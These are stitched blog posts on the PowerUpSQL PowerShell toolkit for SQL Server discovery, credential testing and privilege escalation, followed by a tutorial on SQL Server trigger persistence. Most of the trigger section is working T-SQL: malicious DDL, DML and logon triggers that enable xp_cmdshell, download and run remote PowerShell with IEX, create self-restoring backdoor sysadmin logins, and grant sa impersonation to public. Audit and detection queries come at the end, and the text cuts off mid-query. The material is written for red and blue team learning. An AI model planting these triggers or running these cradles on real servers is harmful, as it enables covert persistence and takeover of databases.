InstanceName : AppName
ServerIP     : 10.1.1.150
TCPPort      : 58979
BaseVersion  : 10.50.4000.0
IsClustered  : No
The example below shows how to run the UDP scan and save the list of enumerated SQL Servers to a file for later use:
PS C:\>Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 | Select-Object Instance -ExpandProperty Instance | Out-File c:\temp\test.txt
Big thanks to Eric Gruber for his work on this function!

Get-SQLInstanceFile

Sometimes you’ll already have a list of SQL Servers to target. For example, you may have already discovered SQL Server instances and saved them to a file for later use. ;) This function loads those instances from a file so they can be fed through the PowerShell pipeline into other PowerUpSQL functions. It accepts a file containing one SQL Server instance per line. Below are examples of the three formats it accepts.
  • Servername
  • Servername\Instancename
  • Servername,port
Below is a basic command example:
PS C:\> Get-SQLInstanceFile -FilePath C:\temp\instances.txt

ComputerName   Instance                      
------------   --------                      
SQLServer1    SQLServer1\SQLEXPRESS     
SQLServer1    SQLServer1\STANDARDDEV2014
SQLServer2    SQLServer2,1433    
SQLServer2    SQLServer2
The example below shows how to load a list of SQL Server instances from a file and attempt to log into each of them with the user “test” and the password “test”.
PS C:\> Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
VERBOSE: SQLServer1\SQLEXPRESS : Connection Success.
VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer2,1433 : Connection Failed.
VERBOSE: SQLServer2 : Connection Success.

ComputerName   Instance                  Status    
------------   --------                  ------    
SQLServer1    SQLServer1\SQLEXPRESS      Accessible
SQLServer1    SQLServer1\STANDARDDEV2014 Accessible
SQLServer2    SQLServer2,1433            Not Accessible
SQLServer2    SQLServer2                 Accessible

Get-SQLInstanceDomain

This function is useful if you’re already a domain user and looking for SQL Server targets on the domain. It returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL Service Principal Names (SPNs). By default, the function will use the domain and logon server for the current domain account. However, alternative domain credentials can be provided along with an alternative domain controller. To run as an alternative domain user, use the runas command below to launch PowerShell before importing PowerUpSQL.
runas /noprofile /netonly /user:domain\user PowerShell.exe
To simply list SQL Server instances registered on the current domain use the command below.
Get-SQLInstanceDomain –Verbose
To get a list of SQL Server instances that can be logged into with the current Windows user you can use the command below. In large environments, I think you’ll be surprised to see how many SQL Servers normal domain users can log into.
Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 10 | Where-Object {$_.Status –eq ‘Accessible’}

Why do Domain User Accounts Have Unauthorized Access to so Many SQL Servers on the Domain?

It’s pretty common for people to doubt that members of the Active Directory group "Domain Users" would have any privileges on domain SQL Servers. However, in our experience it’s incredibly common in large environments for two reasons:
  1. Developers and SQL Server administrators have a habit of explicitly providing login privileges to all members of the Active Directory group “Domain Users”. This seems to happen a lot, because domain groups aren’t created for managing access to associated databases.
  2. When a SQL Server Express instance is installed on a domain system (and the TCP listener is enabled), a privilege inheritance chain exists that allows members of the Active Directory “Domain Users” group to log into the SQL Server instance with Public role privileges. This privilege chain is outlined in the blog “When Databases Attack: SQL Server Express Privilege Inheritance Issue“.
Due to the two common configurations described above, it’s often possible to gain a foothold in SQL Server instances once any domain user is compromised. Naturally, this can lead to unauthorized data access, and provide the next step towards domain privilege escalation. Both topics will be covered in future blogs.

Wrap Up

In this blog I provided an overview of how SQL Server instances can be discovered with PowerUpSQL. I also provided some insight into why it’s common for standard domain users to have unauthorized access to some SQL Server instances on the domain. Hopefully the information will be useful to the red and blue teamers out there. Good luck and hack responsibly!

[Next post, published 2016-07-15]

In this blog I’ll introduce the PowerUpSQL PowerShell module, which supports SQL Server instance discovery, auditing for weak configurations, and privilege escalation on scale. It primarily targets penetration testers and red teams. However, PowerUpSQL also includes many functions that could be used by administrators to inventory the SQL Servers on their ADS domain. Hopefully you'll find it as helpful as I do. The PowerUpSQL project is currently available on GitHub and the PowerShell Gallery. For those of you who are interested in an overview, take a peek at the rest of the blog.

Loading PowerUpSQL

Below are three options for loading the PowerUpSQL PowerShell module.  Choose the one that works best for you. :)
  1. Install it from the PowerShell Gallery. This requires local administrative privileges and will permanently install the module.
    Install-Module -Name PowerUpSQL
  2. Download the project and import the module. This does not require administrative privileges and will only be imported into the current session. However, it may be blocked by restrictive execution policies.
    Import-Module PowerUpSQL.psd1
  3. Load it via a download cradle. This does not require administrative privileges and will only be imported into the current session. It should not be blocked by execution policies.
    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
    Note: To run as an alternative domain user, use the runas command to launch PowerShell prior to loading PowerUpSQL.
    runas /noprofile /netonly /user:domain\user PowerShell.exe

PowerUpSQL Overview

I’m a bit of an SQL Server enthusiast and have written a few SQL Server attack scripts in the past.  However, using the standalone scripts for attacking SQL Server is slow. Especially when they only support execution against one server at a time.  So, I rolled most of my old work into this module, so SQL Server recon and privilege escalation attacks can be executed a little faster and on scale.  I’m planning to continue to write functions for the module so hopefully it will get better over time. Luckily Antti Rantasaari and Eric Gruber have also been contributing some code to make my life easier. :) Below is an overview of the key design objectives met by the version 1.0 release.  A full list of available functions can be found in the readme.md of the GitHub project.

Easy Server Discovery

Blindly identify local, domain, and non-domain SQL Server instances on scale using discovery functions. The example below shows how to get a list of all of the SQL Servers with registered SPNs on the current domain.
PS C:\>Get-SQLInstanceDomain -Verbose        
VERBOSE: Grabbing SQL Server SPNs from domain...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 35 instances were found.

ComputerName     : SQLServer1.domain.com
Instance         : SQLServer1.domain.com\STANDARDDEV2014
DomainAccountSid : 1500000521000123456712921821222049996811922123456
DomainAccount    : SQLSvc
DomainAccountCn  : SQLSvc
Service          : MSSQLSvc
Spn              : MSSQLSvc/SQLServer1.domain.com:STANDARDDEV2014
LastLogon        : 6/22/2016 9:00 AM
Description      : This is a test SQL Server.

...[SNIP]...

Easy Server Auditing

Invoke-SQLAudit audits for common high impact vulnerabilities and weak configurations using the current login's privileges. Also, Invoke-SQLDumpInfo can be used to quickly inventory databases, privileges, and other information. Below is an example showing how to dump a basic inventory list of common objects from SQL Server to CSV files.
PS C:\> Invoke-SQLDumpInfo -Verbose -Instance "SQLServer1\STANDARDDEV2014"
VERBOSE: Verified write access to output directory.
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - START 
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting non-default databases...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database users for databases...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting privileges for databases...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database roles...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database role members...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database schemas...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database tables...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database views...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database columns...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server logins...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server config settings...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server privileges...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server roles...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server role members...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server links...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server credentials...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting SQL Server service accounts...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting stored procedures...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting DML triggers...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting DDL triggers...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server version information...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 – END

A collection of .csv files should now be ready for your review. :) Now let's take it a little further. Below is an example showing how to perform an audit for common high impact configuration issues. It only includes one issue for the sake of saving space, but hopefully you get the idea.
PS C:\> Invoke-SQLAudit -Verbose -Instance "SQLServer1\STANDARDDEV2014"

...[SNIP]...

ComputerName  : SQLServer1 
Instance      : SQLServer1\STANDARDDEV2014
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.             
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. 
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The test (Sysadmin) is configured with the password test.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

...[SNIP]...

Note: You can also save the audit results to a CSV by using the OutFolder switch.

Easy Server Exploitation

Invoke-SQLEscalatePriv attempts to obtain sysadmin privileges using identified vulnerabilities.  Also, this is essentially the namesake function for the module. I thought "PowerUpSQL" was a fun play off of the Windows privilege escalation script PowerUp by Will Schroeder. Below is an example showing an attempt to obtain sysadmin privileges on a SQL Server using Invoke-SQLEscalatePriv. By default, it will return no output so that it can be used by other scripts.  To view the results use the verbose flag.
PS C:\> Invoke-SQLEscalatePriv -Verbose -Instance "SQLServer1\Instance1"

VERBOSE: SQLServer1\Instance1: Checking if you're already a sysadmin...
VERBOSE: SQLServer1\Instance1: You're not a sysadmin, attempting to change that...
VERBOSE: LOADING VULNERABILITY CHECKS.
VERBOSE: RUNNING VULNERABILITY CHECKS.

...[SNIP]...

VERBOSE: COMPLETED ALL VULNERABILITY CHECKS.
VERBOSE: SQLServer1\Instance1 : Success! You are now a sysadmin!

Flexibility

PowerUpSQL functions support the PowerShell pipeline so they can easily be used together, or with other scripts.  For example, you can quickly get a list of non-default databases from the local server.
PS C:\> Get-SQLInstanceLocal | Get-SQLDatabase -Verbose -NoDefaults

ComputerName        : SQLServer1
Instance            : SQLServer1\STANDARDDEV2014
DatabaseId          : 7
DatabaseName        : testdb
DatabaseOwner       : sa
OwnerIsSysadmin     : 1
is_trustworthy_on   : True
is_db_chaining_on   : False
is_broker_enabled   : True
is_encrypted        : False
is_read_only        : False
create_date         : 4/13/2016 4:27:36 PM
recovery_model_desc : FULL
FileName            : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf
DbSizeMb            : 3.19
has_dbaccess        : 1

...[SNIP]...

Scalability

This is the best part. Pipeline support combined with multi-threading via Invoke-Parallel (runspaces) allows users to execute PowerUpSQL functions against many SQL Servers very quickly. A big thank you goes out to Rambling Cookie Monster (Warren F) and Boe Prox for sharing their experiences with runspaces via blogs and GitHub. Without their work I would most likely have been stuck using PowerShell jobs. Blah. Below is a basic example showing how to identify the SQL Server instances on the domain that the current user can log into. This is a short example, but most large organizations have thousands of instances.
PS C:\> Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10

...[SNIP]...

ComputerName   Instance                       Status    
------------   --------                       ------    
Server1        Server1\SQLEXPRESS             Accessible
Server1        Server1\STANDARDDEV2014        Accessible
Server2        Server2\STANDARDDEV2008        Not Accessible

...[SNIP]...
To make that command even more useful, I recommend saving the output to a variable so you can quickly target the accessible servers. Example below:
PS C:\> $Servers = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -eq "Accessible"}
Then you can run other functions against the accessible servers very quickly via piping. For example, grabbing server information from the accessible SQL Server instances:
PS C:\> $Servers | Get-SQLServerInfo -Verbose

...[SNIP]...

ComputerName           : SQLServer1
InstanceName           : SQLServer1\STANDARDDEV2014
DomainName             : Domain
ServiceName            : MSSQL$STANDARDDEV2014
ServiceAccount         : LocalSystem
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.4213.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : SP1
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 8.1 Pro
OsVersionNumber        : 6.3
Currentlogin           : Domain\MyUser
IsSysadmin             : Yes
ActiveSessions         : 3

...[SNIP]...

Portability

Last, but not least, PowerUpSQL uses the .NET Framework SqlClient library, so there are no dependencies on SQLPS or the SMO libraries. That also means you don't have to run it on a system where SQL Server has been installed. Functions have also been designed so they can be run independently.
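For example, a single function can be run on its own against a specific instance, and most functions also accept alternative SQL login credentials (the instance and credentials below are placeholders):
PS C:\> Get-SQLServerInfo -Verbose -Instance "SQLServer1\STANDARDDEV2014" -Username testuser -Password Password123!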

Wrap Up

PowerUpSQL can support a lot of use cases that are helpful to both attackers and admins. As time goes on, I'll try to write some follow-up blogs that touch on them. In the meantime, I hope you like the module. Feel free to submit tickets in the GitHub repository if something doesn't work as expected. I'd love some constructive feedback. Good luck and hack responsibly!

Thanks People!

Thank you to the NetSPI development team for letting me pester you with stupid questions. Big thanks to Eric Gruber, Antti Rantasaari, and Khai Tran for the brainstorming sessions and code contributions. Of course, that really extends to the entire NetSPI team, but this blog is already too long. :)

Maintaining Persistence via SQL Server – Part 2: Triggers

In this blog, we'll show how three types of SQL Server triggers can be abused to maintain access to Windows environments. We'll also take a look at some ways to detect potentially malicious triggers. For demo purposes, I've provided a PowerShell script that can be used to create malicious DDL triggers in your own lab. Hopefully the content will be useful to both red and blue teams trying to test detective capabilities within SQL Server. Below is an overview of what will be covered. Feel free to skip ahead if you don't feel like doing the lab at home. ;)

**UPDATE**

I finally found some time to add Get-SQLPersistTriggerDDL to PowerUpSQL. Below is a sample PowerUpSQL command.

# Load PowerUpSQL in the PowerShell console
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

# Install malicious trigger
Get-SQLPersistTriggerDDL -Instance "MSSQLSRV04\SQLSERVER2014" -NewSqlUser mysqluser4 -NewSqlPass NewPassword123!
If you want to run through an entire attack workflow, I've also created a command cheat sheet here.

Setting up the Lab

For those of you following along at home, I've put together some basic lab setup instructions below.
  1. I recommend using a commercial version of SQL Server so that database-level auditing can be enabled. However, the actual attacks can be conducted against any version of SQL Server. If you don't have a commercial version, download the Microsoft SQL Server Express installer that includes SQL Server Management Studio. It can be downloaded from https://msdn.microsoft.com/en-us/evalcenter/dn434042.aspx
  2. Install SQL Server by following the wizard, but make sure to enable mixed-mode authentication and run the service as LocalSystem for the sake of the lab.
  3. Log into the SQL Server with the "sa" account setup during installation using the SQL Server Management Studio application.
  4. Press the "New Query" button and use the TSQL below to create a database named "testdb".
    -- Create database
    CREATE DATABASE testdb
    
    -- Select database
    USE testdb
    
    -- Create table
    CREATE TABLE dbo.NOCList
    (SpyName text NOT NULL,RealName text NULL)
  5. Run the query below to populate the "NOCList" table with some records.
    -- Add sample records to table 
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Sean Connery')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Ethan Hunt','Tom Cruise')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Jason Bourne','Matt Damon')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Daniel Craig')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Pierce Brosnan')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Roger Moore')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Timothy Dalton')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','George Lazenby')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Harry Hart','Colin Firth')
    
  6. Run the query below to add a login named "testuser".
    -- Select the testdb database
    USE testdb
    
    -- Create server login
    CREATE LOGIN [testuser] WITH PASSWORD = 'Password123!';
    
    -- Create database account for the login
    CREATE USER [testuser] FROM LOGIN [testuser];
    
    -- Assign default database for the login
    ALTER LOGIN [testuser] with default_database = [testdb];
    
    -- Add table insert privileges
    GRANT INSERT ON testdb.dbo.NOCList to [testuser]
    

Setting up the Auditing

In part 1 of this blog series we covered how to audit for potentially malicious SQL Server events, like when xp_cmdshell is enabled or new sysadmins are created. In this section I'll provide some additional events that can provide context specific to potentially dangerous SQL Server triggers and login impersonation. To get started, below are some instructions for setting up auditing to monitor server- and database-level object changes. In most production environments, object changes shouldn't occur at the database or server levels very often. However, the reality is that sometimes they do, so you may have to tweak the audit settings for your environment. Either way, this should get you started if you haven't seen it before.
  1. Create and enable a SERVER AUDIT so that all of our events will get forwarded to the Windows application log.
    -- Select master database
    USE master
    
    -- Create audit
    CREATE SERVER AUDIT Audit_Object_Changes
    TO APPLICATION_LOG
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE)
    ALTER SERVER AUDIT Audit_Object_Changes
    WITH (STATE = ON)
    
  2. Create an enabled SERVER AUDIT SPECIFICATION. This will enable auditing of defined server level events. In this case, the creation, modification, and deletion of server level objects. It will also log when user impersonation privileges are assigned and used.
    -- Create server audit specification
    CREATE SERVER AUDIT SPECIFICATION Audit_Server_Level_Object_Changes
    FOR SERVER AUDIT Audit_Object_Changes
    ADD (SERVER_OBJECT_CHANGE_GROUP),
    ADD (SERVER_OBJECT_PERMISSION_CHANGE_GROUP),
    ADD (SERVER_PERMISSION_CHANGE_GROUP),
    ADD (SERVER_PRINCIPAL_IMPERSONATION_GROUP)
    WITH (STATE = ON)
    
  3. Create an enabled DATABASE AUDIT SPECIFICATION. This will enable auditing of specific database level events. In this case, the creation, modification, and deletion of database level objects. Note: This option is only available in commercial versions of SQL Server.
    -- Create the database audit specification
    CREATE DATABASE AUDIT SPECIFICATION Audit_Database_Level_Object_Changes
    FOR SERVER AUDIT Audit_Object_Changes
    ADD (DATABASE_OBJECT_CHANGE_GROUP) 
    WITH (STATE = ON)
    GO
    
  4. Verify that auditing has been configured correctly by viewing the audit specifications with the queries below.
    --View audit server specifications
    SELECT		audit_id, 
    		a.name as audit_name, 
    		s.name as server_specification_name,
    		d.audit_action_name,
    		s.is_state_enabled,
    		d.is_group,
    		d.audit_action_id,	
    		s.create_date,
    		s.modify_date
    FROM sys.server_audits AS a
    JOIN sys.server_audit_specifications AS s
    ON a.audit_guid = s.audit_guid
    JOIN sys.server_audit_specification_details AS d
    ON s.server_specification_id = d.server_specification_id
    
    -- View database specifications
    SELECT	a.audit_id,
    		a.name as audit_name,
    		s.name as database_specification_name,
    		d.audit_action_name,
    		s.is_state_enabled,
    		d.is_group,
    		s.create_date,
    		s.modify_date,
    		d.audited_result
    FROM sys.server_audits AS a
    JOIN sys.database_audit_specifications AS s
    ON a.audit_guid = s.audit_guid
    JOIN sys.database_audit_specification_details AS d
    ON s.database_specification_id = d.database_specification_id
    
For more SQL Server auditing groups and options, check out the links below:
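You can also enumerate all available audit actions and action groups directly from the server with the query below.

-- List all available audit actions and action groups
SELECT DISTINCT action_id, name, class_desc, parent_class_desc, containing_group_name
FROM sys.dm_audit_actions
ORDER BY parent_class_desc, containing_group_name, name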

Malicious Trigger Creation

Based on my initial reading, there are three primary types of triggers in SQL Server: DML, DDL, and logon triggers. In this section I'll cover how each type of trigger can be used to maintain access to a Windows environment during a red team or penetration test engagement. Similar to the last blog, each trigger will be designed to add a sysadmin and execute an arbitrary PowerShell command. For the sake of the blog, all examples will be done from the perspective of an attacker that has already obtained sysadmin privileges. Note: Triggers can also be created by any login that has been granted the privileges to do so. You can view those privileges with the queries at https://gist.github.com/nullbind/6da28f66cbaeeff74ed5.

Creating Malicious DDL Triggers

Data Definition Language (DDL) triggers can be applied at the server and database levels. They can be used to take actions prior to or after DDL statements like CREATE, ALTER, and DROP. This makes DDL triggers a handy option for persistence, because they can be used even when no custom databases exist on the target server.

Example Code

In this example, we'll create a DDL trigger designed to add a sysadmin named "SysAdmin_DDL" and execute a PowerShell script from the internet that will write a file to "c:\temp\trigger_demo_ddl.txt" when any login is created, altered, or deleted.
-- Enable xp_cmdshell
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO

-- Create the DDL trigger
CREATE Trigger [persistence_ddl_1]
ON ALL Server
FOR DDL_LOGIN_EVENTS
AS

-- Download and run a PowerShell script from the internet
EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_ddl.ps1'')"';

-- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist
if (SELECT count(name) FROM sys.sql_logins WHERE name like 'SysAdmin_DDL') = 0
BEGIN
	-- Create a login
	CREATE LOGIN SysAdmin_DDL WITH PASSWORD = 'Password123!';

	-- Add the login to the sysadmin fixed server role
	EXEC sp_addsrvrolemember 'SysAdmin_DDL', 'sysadmin';
END
GO
The next time a sysadmin creates, alters, or drops a login, you should notice that a new "SysAdmin_DDL" login and a "c:\temp\trigger_demo_ddl.txt" file have been created. Also, if you drop the "SysAdmin_DDL" login, the trigger just adds it back again ;). If you want to, you can also be a bit annoying with triggers. For example, the "persistence_ddl_2" trigger below can be used to recreate "persistence_ddl_1" if it is removed.
CREATE Trigger [persistence_ddl_2]
ON ALL Server 
FOR DROP_TRIGGER
AS
exec('CREATE Trigger [persistence_ddl_1]
	on ALL Server 
	for DDL_LOGIN_EVENTS
	as

	-- Download a PowerShell script from the internet to memory and execute it
	EXEC master..xp_cmdshell ''Powershell -c "IEX(new-object net.webclient).downloadstring(''''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1'''')"'';

	-- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist
	if (select count(name) from sys.sql_logins where name like ''SysAdmin_DDL'') = 0

		-- Create a login
		CREATE LOGIN SysAdmin_DDL WITH PASSWORD = ''Password123!'';
	
		-- Add the login to the sysadmin fixed server role
		EXEC sp_addsrvrolemember ''SysAdmin_DDL'', ''sysadmin'';
		')
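As a quick sanity check of the self-healing behavior described above, drop the backdoor login from a sysadmin session and watch the DDL trigger put it right back:

-- Dropping the login fires DDL_LOGIN_EVENTS, and the trigger recreates it
DROP LOGIN SysAdmin_DDL

-- Confirm the login came back
SELECT name FROM sys.sql_logins WHERE name = 'SysAdmin_DDL'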
You could also trigger on all "DDL_EVENTS", but I haven't done enough testing to guarantee that it wouldn't cause a production server to burst into flames. Aaanyways… if you want to confirm that your triggers were actually added, you can use the query below.
SELECT * FROM sys.server_triggers 
Also, below are some links to a list of DDL trigger events that can be targeted beyond the examples provided.

Creating Malicious DML Triggers

Data Manipulation Language (DML) triggers work at the database level and can be used to take actions prior to or after DML statements like INSERT, UPDATE, or DELETE. They can be pretty useful if you target database tables where INSERT, UPDATE, or DELETE statements are used on a regular basis. However, there are a few downsides I'll touch on in a bit. To find popular tables to target, I've provided the query below, based on this post: https://stackoverflow.com/questions/13638435/last-executed-queries-for-a-specific-database. It can be used to list recently executed queries that include INSERT statements. If you created the test database and table in the "Setting up the Lab" section, you should see the associated INSERT statements.
-- List popular tables that use INSERT statements
SELECT * FROM 
	(SELECT 
	COALESCE(OBJECT_NAME(qt.objectid),'Ad-Hoc') AS objectname,
	qt.objectid as objectid,
	last_execution_time,
	execution_count,
	encrypted,
    (SELECT TOP 1 SUBSTRING(qt.TEXT,statement_start_offset / 2+1,( (CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(NVARCHAR(MAX),qt.TEXT)) * 2) ELSE statement_end_offset END)- statement_start_offset) / 2+1)) AS sql_statement
	FROM sys.dm_exec_query_stats AS qs
	CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS qt ) x
WHERE sql_statement like 'INSERT%'
ORDER BY execution_count DESC
Example Code

In this example, we'll create a DML trigger designed to add a sysadmin named "SysAdmin_DML" and execute a PowerShell script from the internet that will write a file to "c:\temp\trigger_demo_dml.txt" when an INSERT event occurs in the testdb.dbo.NOCList table. IMPORTANT NOTE: The downside is that least-privilege database users inserting records into the table we're creating our trigger on may not have the privileges required to run xp_cmdshell, etc. To work around that, the script below provides everyone (public) with the privileges to impersonate the sa account. Alternatively, you could configure the xp_cmdshell proxy account or reconfigure the malicious trigger to execute as a sysadmin. While attackers may use any of these methods, changing privileges really shouldn't be done during pentests, because it weakens the security controls of the environment. However, I'm doing it here so we can see the changes in the log.
-- Select master database
USE master

-- Grant all users privileges to impersonate sa (bad idea for pentesters)
GRANT IMPERSONATE ON LOGIN::sa to [Public];

-- Select testdb database
USE testdb

-- Create trigger
CREATE TRIGGER [persistence_dml_1]
ON testdb.dbo.NOCList 
FOR INSERT, UPDATE, DELETE AS

-- Impersonate sa
EXECUTE AS LOGIN = 'sa'

-- Download a PowerShell script from the internet to memory and execute it
EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_dml.ps1'')"';

-- Add a sysadmin named 'SysAdmin_DML' if it doesn't exist
if (select count(*) from sys.sql_logins where name like 'SysAdmin_DML') = 0
BEGIN
	-- Create a login
	CREATE LOGIN SysAdmin_DML WITH PASSWORD = 'Password123!';

	-- Add the login to the sysadmin fixed server role
	EXEC sp_addsrvrolemember 'SysAdmin_DML', 'sysadmin';
END
GO
Now, when anyone (privileged or not) inserts a record into the testdb.dbo.NOCList table, the trigger will run our PowerShell command and add our sysadmin. :) Let's test it out using the steps below.
  1. Log into the server as "testuser" using SQL Server Management Studio Express.
  2. Add some more records to the NOCList table.
    -- Select testdb database
    USE testdb
    
    -- Add sample records to table x 4
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Sean Connery')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Ethan Hunt','Tom Cruise')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Jason Bourne','Matt Damon')
    
  3. Review sysadmins and the local drive for our file.
Finally, you can view all database-level triggers for the currently selected database with the query below (replace [DATABASE] with the target database name).
USE [DATABASE]
SELECT * FROM sys.triggers 

Creating Malicious Logon Triggers

Logon triggers are primarily used to prevent users from logging into SQL Server under defined conditions. The canonical examples include creating a logon trigger to prevent users from logging in after hours or from establishing concurrent sessions. As a result, this is the least useful persistence option, because we would have to actively block a user from authenticating in order for the trigger to run. On the bright side, you can create a logon trigger that binds to a specific least-privilege account. Then simply attempting to log in with that account can execute whatever SQL query or operating system command you want.

Example Code

In this example, we'll create a logon trigger designed to execute a PowerShell script from the internet that will write a file to "c:\temp\trigger_demo_logon.txt" when the SQL login "testuser" successfully authenticates and is prevented from logging in. This trigger is also configured to run as the "sa" default sysadmin account.
-- Create trigger
CREATE Trigger [persistence_logon_1]
ON ALL SERVER WITH EXECUTE AS 'sa'
FOR LOGON
AS
BEGIN
IF ORIGINAL_LOGIN() = 'testuser'
	-- Download a PowerShell script from the internet to memory and execute it
    EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_logon.ps1'')"';
END;
Now when you try to log on with the "testuser" account, the login will be denied. You won't be able to log in, but the SQL Server will execute your trigger and the associated PowerShell code. You can view all server and logon triggers with the query below.
SELECT * FROM sys.server_triggers 
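If you'd rather trip the logon trigger from a console instead of SQL Server Management Studio, a simple connection attempt does the trick (a hypothetical example; adjust the instance name for your lab):

# The login attempt below is blocked by the trigger, but the trigger body
# (and its PowerShell payload) still executes on the server
sqlcmd -S "SQLServer1\STANDARDDEV2014" -U testuser -P "Password123!"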

Malicious Trigger Detection

If you enabled auditing during the lab setup, you should see event ID 33205 in the Windows Application event log. The "statement" field should start with "CREATE Trigger" for all three types of triggers, immediately followed by the rest of the trigger's source code. From here you could write some SIEM rules to generate an alert when the "statement" field contains keywords like xp_cmdshell, powershell, and sp_addsrvrolemember along with the CREATE Trigger statement. We also provided the public role with the ability to impersonate the "sa" login; that event ends up under event ID 33205 as well, this time with the GRANT statement in the "statement" field. Once again, SIEM rules could be created to watch for GRANT statements assigning IMPERSONATE privileges. In yet another event ID 33205 log entry, we can actually see the name of the trigger, the login that executed the trigger, and the login being impersonated. That can be pretty useful information. :) In this case, it may be worth watching for "EXECUTE AS" in the statement field. However, depending on the environment, some tweaking may be needed.
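As a rough starting point for that kind of alerting, the PowerShell below pulls 33205 events that reference common trigger-abuse keywords (a minimal sketch; the provider name and noise level will vary by environment):

# Find SQL Server audit events (ID 33205) whose statement references suspicious keywords
Get-WinEvent -FilterHashtable @{LogName='Application'; Id=33205} |
    Where-Object { $_.Message -match 'xp_cmdshell|powershell|sp_addsrvrolemember|EXECUTE AS' } |
    Select-Object TimeCreated, ProviderName, Message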

Viewing Server Level Triggers (DDL and LOGON)

Below is a code snippet that can be used to list server-level triggers and the associated source code. Please note that you must be a sysadmin in order to view the source code.
SELECT	name,
OBJECT_DEFINITION(OBJECT_ID) as trigger_definition,
parent_class_desc,
create_date,
modify_date,
is_ms_shipped,
is_disabled
FROM sys.server_triggers WHERE 
OBJECT_DEFINITION(OBJECT_ID) LIKE '%xp_cmdshell%' OR
OBJECT_DEFINITION(OBJECT_ID) LIKE '%powershell%' OR
OBJECT_DEFINITION(OBJECT_ID) LIKE '%sp_addsrvrolemember%' 
ORDER BY name ASC

Viewing Database Level Triggers (DML)

Below is a code snippet that can be used to list database-level triggers and the associated source code. Please note that you must be a sysadmin (or have the required privileges) and have selected the database that the triggers were created in.
-- Select testdb
USE testdb

-- Select potentially evil triggers
